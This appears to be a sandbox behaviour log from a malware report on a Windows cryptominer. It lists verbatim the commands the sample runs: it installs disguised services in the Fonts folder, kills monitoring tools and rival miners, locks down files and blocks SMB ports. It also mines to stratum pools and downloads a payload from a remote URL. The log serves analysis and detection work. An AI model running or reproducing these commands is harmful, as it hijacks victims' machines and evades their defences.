Technical Information
- [<HKLM>\System\CurrentControlSet\Services\MetPipAtcivator] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\MetPipAtcivator] 'ImagePath' = '%WINDIR%\Fonts\svchost.exe'
- [<HKLM>\System\CurrentControlSet\Services\SetPipAtcivator] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\SetPipAtcivator] 'ImagePath' = '%WINDIR%\Fonts\svchost.exe'
- [<HKLM>\System\CurrentControlSet\Services\PolicyAgent] 'Start' = '00000002'
- '%WINDIR%\syswow64\net.exe' stop MetPipAtcivator
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im notepad.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im ftp.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im p.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im TrustedInsteller.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im dllhostex.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im lsmos.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im splwow64.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im servcies.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im wscript.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im rundll32.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im lsmm.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im msinfo.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im seser.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im powershell.exe
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.1
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.0
- '%WINDIR%\syswow64\net.exe' stop lanmanserver /y
- '%WINDIR%\syswow64\net.exe' stop SetPipAtcivator
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im csrs.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im cscript.exe
- %WINDIR%\syswow64\cmd.exe
- %WINDIR%\syswow64\taskkill.exe
- %WINDIR%\fonts\svchost.exe
- %WINDIR%\fonts\conhost.exe
- %WINDIR%\temp\chost.bat
- <Current directory>\tem.vbs
- nul
- %WINDIR%\fonts\rundllhost.exe
- %WINDIR%\fonts\conhost.exe
- %WINDIR%\fonts\svchost.exe
- <Current directory>\tem.vbs
- %WINDIR%\fonts\rundllhost.exe
- <Current directory>\tem.vbs
- <DRIVERS>\etc\hosts
- DNS ASK a.###ke.website
- ClassName: '' WindowName: ''
- '%WINDIR%\fonts\svchost.exe' start MetPipAtcivator
- '%WINDIR%\fonts\conhost.exe'
- '%WINDIR%\fonts\svchost.exe' start SetPipAtcivator
- '%WINDIR%\fonts\svchost.exe' set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
- '%WINDIR%\fonts\svchost.exe' install SetPipAtcivator rundllhost -o stratum+tcp://a.beike.website:1230 -u BaiDu -k --donate-level=1 -r3 --asm=AUTO --print-time=3 --nicehash -o stratum+tcp://b.beike.website:1235 -u BaiDu -k ...
- '%WINDIR%\fonts\svchost.exe' set MetPipAtcivator Description Provides performance library information from Windows Management.
- '%WINDIR%\fonts\svchost.exe' set SetPipAtcivator DisplayName WMI Performance Services
- '%WINDIR%\syswow64\wscript.exe' "<Current directory>\tem.vbs"
- '%WINDIR%\fonts\svchost.exe' set MetPipAtcivator DisplayName Network Location Service
- '%WINDIR%\fonts\svchost.exe' install MetPipAtcivator %WINDIR%\Fonts\conhost.exe
- '%WINDIR%\fonts\rundllhost.exe' -o stratum+tcp://a.beike.website:1230 -u BaiDu -k --donate-level=1 -r3 --asm=AUTO --print-time=3 --nicehash -o stratum+tcp://b.beike.website:1235 -u BaiDu -k --donate-level=1 -r3 --asm=AUTO --p...
- '%WINDIR%\fonts\svchost.exe'
- '%WINDIR%\fonts\svchost.exe' install SetPipAtcivator rundllhost -o stratum+tcp://a.beike.website:1230 -u BaiDu -k --donate-level=1 -r3 --asm=AUTO --print-time=3 --nicehash -o stratum+tcp://b.beike.website:1235 -u BaiDu -k ...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im perfmon.exe /f /T' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im procexp.exe /f /T' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im ProcessHacker.exe /f /T' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.0' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop SetPipAtcivator' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.1' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete MetPipAtcivator' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop MetPipAtcivator' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' start SetPipAtcivator' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im autoruns.exe /f /T' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' set SetPipAtcivator DisplayName WMI Performance Services' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete SetPipAtcivator' (with hidden window)
- '%WINDIR%\syswow64\net1.exe' user mm123$ /del' (with hidden window)
- '%WINDIR%\syswow64\net.exe' user mm123$ /del' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c attrib +s +a %WINDIR%\Fonts' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.0' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' install MetPipAtcivator %WINDIR%\Fonts\conhost.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im rundll32.exe /f /T' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' set MetPipAtcivator DisplayName Network Location Service' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.1' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' set MetPipAtcivator Description Provides performance library information from Windows Management.' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' start MetPipAtcivator' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\TEMP\chost.bat' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config lanmanserver start= DISABLED 2>nul' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop lanmanserver /y' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete lanmanserver' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im taskmgr.exe /f /T' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c attrib -s -h -r -a %WINDIR%\Fonts' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c attrib -s -h -r -a %WINDIR%\Fonts
- '%WINDIR%\syswow64\sc.exe' stop clr_optimization_v4.0.30318_64
- '%WINDIR%\syswow64\sc.exe' delete clr_optimization_v4.0.30318_64
- '%WINDIR%\syswow64\cacls.exe' "%WINDIR%\tasksche.exe" /d everyone
- '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\WmiAppSrv\svchost.exe" /d everyone
- '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\WmiAppSvr\svchost.exe" /d everyone
- '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\WmiApprsv\svchost.exe" /d everyone
- '%WINDIR%\syswow64\sc.exe' stop clr_optimization_v4.0.30328_64
- '%WINDIR%\syswow64\sc.exe' delete clr_optimization_v4.0.30328_64
- '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\WmiAppSrv\csrss.exe" /d everyone
- '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\Microsoft\WmiApprsv\csrss.exe" /d everyone
- '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\clr_optimization_v4.0.30328_64\svchost.exe" /d everyone
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\clr_optimization_v4.0.30328_64\\svchost.exe'" call Terminate
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath='C:\\programdata\\wmiappsrv\\svchost.exe'" call Terminate
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSvr\\svchost.exe'" call Terminate
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath='C:\\programdata\\wmiapprsv\\svchost.exe'" call Terminate
- '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\Microsoft\WmiAppSrv\csrss.exe" /d everyone
- '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\Microsoft\WmiAppSvr\csrss.exe" /d everyone
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath='C:\\programdata\\wmiapprsv\\csrss.exe'" call Terminate
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSvr\\csrss.exe'" call Terminate
- '%WINDIR%\syswow64\sc.exe' stop csrss
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\svchost.exe
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\svchost.exe /d everyone
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\system\lsaus.exe
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\system\lsaus.exe /d everyone
- '%WINDIR%\syswow64\sc.exe' delete csrss
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\splwow64.exe
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath='C:\\indows\\SysWOW64\\csrss.exe'" call Terminate
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\debug\lsmos.exe
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\Temp\\conhost.exe'" call Terminate
- '%WINDIR%\syswow64\sc.exe' stop RpcEpt
- '%WINDIR%\syswow64\sc.exe' delete RpcEpt
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\SysWOW64\csrss.exe
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\csrss.exe /d everyone
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\debug\lsmos.exe /d everyone
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\Temp\conhost.exe
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Temp\conhost.exe /d everyone
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSrv\\csrss.exe'" call Terminate
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Cursors\TrustedInsteller.exe /d everyone
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\Fonts\Mysql /a
- '%WINDIR%\syswow64\attrib.exe' -s -h -r %WINDIR%\Fonts\Mysql
- '%WINDIR%\syswow64\cacls.exe' "%WINDIR%\Fonts\Mysql" /g everyone:f
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\Fonts\Mysql\Doublepulsar.dll /a
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\Fonts\Mysql\Doublepulsar2.dll /a
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\Cursors\TrustedInsteller.exe
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\Fonts\Mysql\Eternalblue.dll /a
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrustedInsteller.exe" /v "debugger" /d taskkill.exe /f
- '%WINDIR%\syswow64\attrib.exe' -s -h -r %WINDIR%\Fonts\Mysql\Doublepulsar.dll
- '%WINDIR%\syswow64\attrib.exe' -s -h -r %WINDIR%\Fonts\Mysql\Eternalblue.dll
- '%WINDIR%\syswow64\attrib.exe' -s -h -r %WINDIR%\Fonts\Mysql\Eternalblue2.dll
- '%WINDIR%\syswow64\cacls.exe' "%WINDIR%\Fonts\Mysql\Doublepulsar.dll" /g everyone:f
- '%WINDIR%\syswow64\cacls.exe' "%WINDIR%\Fonts\Mysql\Doublepulsar2.dll" /g everyone:f
- '%WINDIR%\syswow64\cacls.exe' "%WINDIR%\Fonts\Mysql\Eternalblue.dll" /g everyone:f
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\Fonts\Mysql\Eternalblue2.dll /a
- '%WINDIR%\syswow64\sc.exe' delete WinHelpSvcs
- '%WINDIR%\syswow64\attrib.exe' -s -h -r %WINDIR%\Fonts\Mysql\Doublepulsar2.dll
- '%WINDIR%\syswow64\sc.exe' stop WinHelpSvcs
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\dllhostex.exe /d everyone
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSvr\\csrss.exe'" call Terminate
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='tasksche.exe' and ExecutablePath='C:\\Windows\\tasksche.exe'" call Terminate
- '%WINDIR%\syswow64\attrib.exe' +s +h +r "%PROGRAMDATA%\clr_optimization_v4.0.30318_64\svchost.exe"
- '%WINDIR%\syswow64\attrib.exe' +s +h +r "%PROGRAMDATA%\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe"
- '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\clr_optimization_v4.0.30318_64\svchost.exe" /d everyone
- '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe" /d everyone
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\clr_optimization_v4.0.30318_64\\svchost.exe'" call Terminate
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\clr_optimization_v4.0.30318_64\\csrss.exe'" call Terminate
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppRsv\\csrss.exe'" call Terminate
- '%WINDIR%\syswow64\attrib.exe' +s +h +r "%PROGRAMDATA%\clr_optimization_v4.0.33018_64\svchost.exe"
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\clr_optimization_v4.0.33018_64\\svchost.exe'" call Terminate
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllhostex.exe" /v "debugger" /d taskkill.exe /f
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\NetworkDistribution\\svchost.exe'" call Terminate
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\NetworkDistribution\svchost.exe
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\NetworkDistribution\svchost.exe /d everyone
- '%WINDIR%\syswow64\attrib.exe' +s +h +r <SYSTEM32>\dllhostex.exe
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\servcies.exe /d everyone
- '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\clr_optimization_v4.0.33018_64\svchost.exe" /d everyone
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\splwow64.exe /d everyone
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\SysWOW64\servcies.exe
- '%WINDIR%\syswow64\sc.exe' delete servcies
- '%WINDIR%\syswow64\sc.exe' stop servcies
- '%WINDIR%\syswow64\attrib.exe' +s +a %WINDIR%\Fonts
- '%WINDIR%\syswow64\sc.exe' start MetPipAtcivator
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo y"
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /g everyone:f
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /g everyone:f
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im perfmon.exe /f /T
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im rundll32.exe /f /T
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im ProcessHacker.exe /f /T
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cscript.exe /g everyone:f
- '%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /a
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\wscript.exe /g everyone:f
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe" /f
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im autoruns.exe /f /T
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im taskmgr.exe /f /T
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
- '%WINDIR%\syswow64\sc.exe' delete SetPipAtcivator
- '%WINDIR%\syswow64\sc.exe' config lanmanserver start= DISABLED 2>nul
- '%WINDIR%\syswow64\sc.exe' delete lanmanserver
- '%WINDIR%\syswow64\net.exe' user mm123$ /del
- '%WINDIR%\syswow64\net1.exe' user mm123$ /del
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.0
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.1
- '%WINDIR%\syswow64\sc.exe' delete MetPipAtcivator
- '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\TEMP\chost.bat
- '%WINDIR%\syswow64\net1.exe' stop SetPipAtcivator
- '%WINDIR%\syswow64\net1.exe' stop MetPipAtcivator
- '%WINDIR%\syswow64\ping.exe' 127.1 -n 5
- '%WINDIR%\syswow64\net1.exe' stop mssecsvc2.1
- '%WINDIR%\syswow64\attrib.exe' -s -h -r -a %WINDIR%\Fonts
- '%WINDIR%\syswow64\net1.exe' stop mssecsvc2.0
- '%WINDIR%\syswow64\cmd.exe' /c attrib +s +a %WINDIR%\Fonts
- '%WINDIR%\syswow64\net1.exe' stop lanmanserver /y
- '%WINDIR%\syswow64\cacls.exe' "%WINDIR%\Fonts\Mysql\Eternalblue2.dll" /g everyone:f
- '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe'" call Terminate
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d system
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=deny action=block
- '%WINDIR%\syswow64\netsh.exe' ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
- '%WINDIR%\syswow64\netsh.exe' ipsec static set policy name=Aliyun assign=y
- '%WINDIR%\syswow64\sc.exe' stop xWinWpdSrv
- '%WINDIR%\syswow64\sc.exe' delete xWinWpdSrv
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\SysWOW64\seser.exe
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=Allow action=permit
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\system\msinfo.exe
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\inf\lsmm.exe
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\inf\lsmm.exe /d everyone
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\SysWOW64\csrs.exe
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\csrs.exe /d everyone
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\debug\item.dat /d everyone
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\seser.exe /d everyone
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im procexp.exe /f /T
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\system\msinfo.exe /d everyone
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
- '%WINDIR%\syswow64\takeown.exe' /f <DRIVERS>\etc\hosts /a
- '%WINDIR%\syswow64\cacls.exe' <DRIVERS>\etc\hosts /g users:f
- '%WINDIR%\syswow64\attrib.exe' -s -h -a -r <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
- '%WINDIR%\syswow64\attrib.exe' +s +h +a +r <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\ipconfig.exe' /flushdns
- '%WINDIR%\syswow64\sc.exe' start PolicyAgent
- '%WINDIR%\syswow64\sc.exe' config PolicyAgent start= AUTO
- '%WINDIR%\syswow64\netsh.exe' ipsec static del all
- '%WINDIR%\syswow64\netsh.exe' ipsec static add policy name=Aliyun
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=Allowlist
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=denylist
- '%WINDIR%\syswow64\cacls.exe' <DRIVERS>\etc\hosts /d everyone
- '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
- '%WINDIR%\syswow64\cscript.exe' xxoo.vbs "http://no##.youdao.com/yws/api/personal/file/WEB1ee8da8325603987aaa45c5d566fc7aa?me###################################################################" %WINDIR%\temp\dll.exe